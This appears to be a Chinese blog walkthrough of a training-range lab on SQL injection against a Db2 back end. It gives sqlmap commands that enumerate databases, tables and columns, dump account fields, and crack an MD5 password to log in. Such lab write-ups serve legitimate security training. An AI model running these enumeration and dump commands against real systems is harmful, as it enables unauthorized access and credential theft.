【墨者学院】SQL手工注入漏洞测试(Db2数据库)

背景介绍:

             安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+Db2,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

                         1.掌握SQL注入原理;
                         2.了解手工注入的方法;
                         3.了解Db2的数据结构;
                         4.了解字符串的MD5加解密;

解题方向:

          手工进行SQL注入测试,获取管理密码登录。

解题步骤:

1.  开启环境访问网站:124.70.71.251:46096

2.  寻找注入点:

3.  使用工具sqlmap判断是否存在注入:

python sqlmap.py -u  “漏洞url” 

4.  判断服务器下所有数据库:

python sqlmap.py -u "l漏洞url" --dbs

5.  判断当前数据库名称:

python sqlmap.py -u "漏洞url" --current-db 

6.  查看当前数据库下所有表:

python sqlmap.py -u "漏洞url" -D "数据库名" --tables

7.  判断 GAME_CHARACTER 表下名称:

python sqlmap.py -u "漏洞url" -D "数据库名" -T "表名" --column 

8. 发现只有id参数,查询账号密码字段并dump下来:

python sqlmap.py -u "漏洞url" -D "数据库名" -T "表名" -C name --dump

查询到加密 密码,解密后登录成功发现key:

  • 15
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值